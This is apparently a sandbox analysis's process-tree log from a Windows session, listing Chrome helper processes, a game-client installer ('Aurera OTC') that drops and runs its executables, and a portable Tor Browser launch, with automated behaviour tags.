C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5092 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:660
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5008 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5052 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3164 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3152 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2828 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:1120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1712 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3628
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4388 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5000 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4092
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5016
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5708 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1736
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2340
-
[PID 2660] "C:\Users\Admin\Downloads\aurera+OTC+install.exe"
    - Executes dropped EXE
    [PID 1768] "C:\Users\Admin\AppData\Local\Temp\is-J00RV.tmp\aurera+OTC+install.tmp" /SL5="$11003A,124196076,832512,C:\Users\Admin\Downloads\aurera+OTC+install.exe"
        - Executes dropped EXE
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        [PID 2812] "C:\Users\Admin\AppData\Local\Programs\Aurera Global OT\aurera_dx.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetWindowsHookEx
            [PID 648] C:\Users\Admin\AppData\Local\Programs\Aurera Global OT\aurera_dx.exe (command line: aurera_dx.exe)
                - Executes dropped EXE
                - Loads dropped DLL
                [PID 4380] C:\Users\Admin\AppData\Roaming\OTClientV8\Aurera\aurera_dx-1716192337.exe
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - Checks processor information in registry
                    - Suspicious use of SetWindowsHookEx
[PID 4092] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses
[PID 1716] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=1112 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 468] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5512 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 4884] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3316 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 3144] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5584 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 1484] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 1864] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5248 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 3404] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4372 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 3864] "C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.0.15.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    [PID 1184] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        [PID 1392] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks whether UAC is enabled
            - Checks processor information in registry
            - Suspicious use of SendNotifyMessage
            - Suspicious use of SetWindowsHookEx
            [PID 4116] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.0.622880453\128010337" -parentBuildID 20240510150000 -prefsHandle 2092 -prefMapHandle 2064 -prefsLen 19248 -prefMapSize 243824 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {38a5b149-bc7c-486c-9f70-47c1a0f1b366} 1392 gpu
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 1116] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.1.614942829\1548208988" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2760 -prefsLen 20081 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {086f95ce-70f3-46dc-bdf9-1b6b586e590f} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 1784] "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:785fc6d0f6ba741e60cfc3311dd7fc7f0e73ecfb2a351e2e3e5c748a96 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 1392 DisableNetwork 1
                - Executes dropped EXE
            [PID 2472] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.2.1396928610\2125970775" -childID 2 -isForBrowser -prefsHandle 3412 -prefMapHandle 3408 -prefsLen 20899 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fffaafad-9775-43a9-b61d-a5a7f1dc6d5d} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 3672] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.3.179777915\857124771" -childID 3 -isForBrowser -prefsHandle 3312 -prefMapHandle 3328 -prefsLen 20976 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2be84262-e0f5-405f-9f07-3a8549dc0638} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 5044] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.4.1739778790\1335335097" -parentBuildID 20240510150000 -prefsHandle 3728 -prefMapHandle 3328 -prefsLen 22215 -prefMapSize 243824 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {021463af-a52c-48ea-805b-54c7be79ec0e} 1392 rdd
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 1660] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.5.1623867219\1682794932" -childID 4 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8100e405-4aad-41fe-8d9e-77a985825baf} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 3860] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.6.1788414678\737292336" -childID 5 -isForBrowser -prefsHandle 4248 -prefMapHandle 4256 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {51610cbb-03bf-423e-aec6-50869afc515f} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 1944] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.7.439161912\2044188143" -childID 6 -isForBrowser -prefsHandle 4372 -prefMapHandle 4360 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ce637bf9-1dee-49e3-b37a-924b8f85f570} 1392 tab
                - Executes dropped EXE
                - Loads dropped DLL
            [PID 5500] "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\lyrebird.exe"
                - Executes dropped EXE
                - Modifies system certificate store
                - Suspicious behavior: EnumeratesProcesses
            [PID 3908] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.8.28129042\639231709" -childID 7 -isForBrowser -prefsHandle 3896 -prefMapHandle 3876 -prefsLen 23084 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a10cde01-de24-4736-bfe1-44908c9b2f47} 1392 tab
                - Executes dropped EXE
            [PID 4184] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.9.1785135990\1910091475" -childID 8 -isForBrowser -prefsHandle 4676 -prefMapHandle 4992 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {09d1ba46-6947-4a1c-ab2a-119662ab8c59} 1392 tab
                - Executes dropped EXE
            [PID 5556] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.10.1571063285\781352987" -childID 9 -isForBrowser -prefsHandle 4292 -prefMapHandle 4308 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {383d41c4-a66d-4084-a721-07b0885f4d24} 1392 tab
                - Executes dropped EXE
            [PID 5204] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.11.1784158830\1386819180" -childID 10 -isForBrowser -prefsHandle 4348 -prefMapHandle 4976 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {549d3736-7f4f-486a-abeb-96a7580ba758} 1392 tab
                - Executes dropped EXE
            [PID 5072] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.12.602653644\55381638" -childID 11 -isForBrowser -prefsHandle 5196 -prefMapHandle 5104 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {522d7100-a7ae-4e7c-a79a-1641c7f7fa0f} 1392 tab
                - Executes dropped EXE
            [PID 1824] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.13.12357411\1645925455" -childID 12 -isForBrowser -prefsHandle 5428 -prefMapHandle 5456 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {975a07d3-d670-42c3-ba80-07e16b0e5904} 1392 tab
                - Executes dropped EXE
            [PID 6008] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.14.361288624\839719787" -childID 13 -isForBrowser -prefsHandle 4444 -prefMapHandle 1932 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a80e88eb-1a79-40a7-9079-dd271aaeb970} 1392 tab
                - Executes dropped EXE
            [PID 5428] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.15.961789321\977620180" -parentBuildID 20240510150000 -sandboxingKind 1 -prefsHandle 5712 -prefMapHandle 5716 -prefsLen 25283 -prefMapSize 243824 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {51467e3e-c435-4e64-821c-2e19601ff673} 1392 utility
                - Executes dropped EXE
            [PID 5108] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.16.493970024\953957208" -childID 14 -isForBrowser -prefsHandle 5956 -prefMapHandle 5972 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {bcc244ec-9182-4631-a6ea-8f0c741a6d6c} 1392 tab
                - Executes dropped EXE
            [PID 5644] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.17.434641906\1818172257" -childID 15 -isForBrowser -prefsHandle 9808 -prefMapHandle 4132 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b205ce04-df36-4dda-bd6a-89f908ab91af} 1392 tab
                - Executes dropped EXE
            [PID 3088] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.18.130841608\1163909127" -childID 16 -isForBrowser -prefsHandle 4560 -prefMapHandle 9724 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ee1e5ad0-a5cc-44b1-b414-a8dc05c8a484} 1392 tab
                - Executes dropped EXE
            [PID 332] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.19.891700938\181589749" -childID 17 -isForBrowser -prefsHandle 5380 -prefMapHandle 5328 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {16e4b8c0-07db-430f-aa97-23bf46dbf79d} 1392 tab
                - Executes dropped EXE
            [PID 5996] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.20.1487296909\1257509143" -childID 18 -isForBrowser -prefsHandle 9764 -prefMapHandle 9760 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {d8d5c98e-ea56-4ed1-9270-266b36e7ae15} 1392 tab
                - Executes dropped EXE
            [PID 5868] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.21.2015612201\332560435" -childID 19 -isForBrowser -prefsHandle 4180 -prefMapHandle 4164 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {508b0b62-29d2-471d-b69c-aaac7495cc2a} 1392 tab
                - Executes dropped EXE
            [PID 3492] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.22.476579844\1718346386" -childID 20 -isForBrowser -prefsHandle 4340 -prefMapHandle 3876 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ca03cacd-43c5-4902-aeee-aa714d767340} 1392 tab
                - Executes dropped EXE
            [PID 2216] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.23.844845881\1860038382" -childID 21 -isForBrowser -prefsHandle 5980 -prefMapHandle 4136 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7f950dd4-4815-4f47-8d18-b3548778f22a} 1392 tab
                - Executes dropped EXE
            [PID 1744] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.24.919850134\400484147" -childID 22 -isForBrowser -prefsHandle 5444 -prefMapHandle 5524 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {20682dc7-0531-455b-b258-4ef4c0043b79} 1392 tab
                - Executes dropped EXE
            [PID 6136] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.25.166533848\74661245" -childID 23 -isForBrowser -prefsHandle 5968 -prefMapHandle 4344 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {1324f84d-74b1-4d7d-bc89-602cb12fc23a} 1392 tab
                - Executes dropped EXE
            [PID 4132] "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.26.1783326982\145569928" -childID 24 -isForBrowser -prefsHandle 5236 -prefMapHandle 3760 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {dae3f8fd-54c1-40dc-83e5-21e9bfedcf1d} 1392 tab
                - Executes dropped EXE
[PID 3872] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 5816] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1920 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 968] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 4900] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 2888] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3180 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 5908] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1116 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 5220] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5368 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 1972] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5532 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 4352] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 5976] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3924 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 6068] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=4692 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 60] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3292 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 3416] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 4972] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=4456 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 2796] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=4920 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 4992] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=5728 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 792] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=400 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[PID 4964] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5384 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[PID 2108] "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4064 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=5880 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4496
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5332 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5232
-
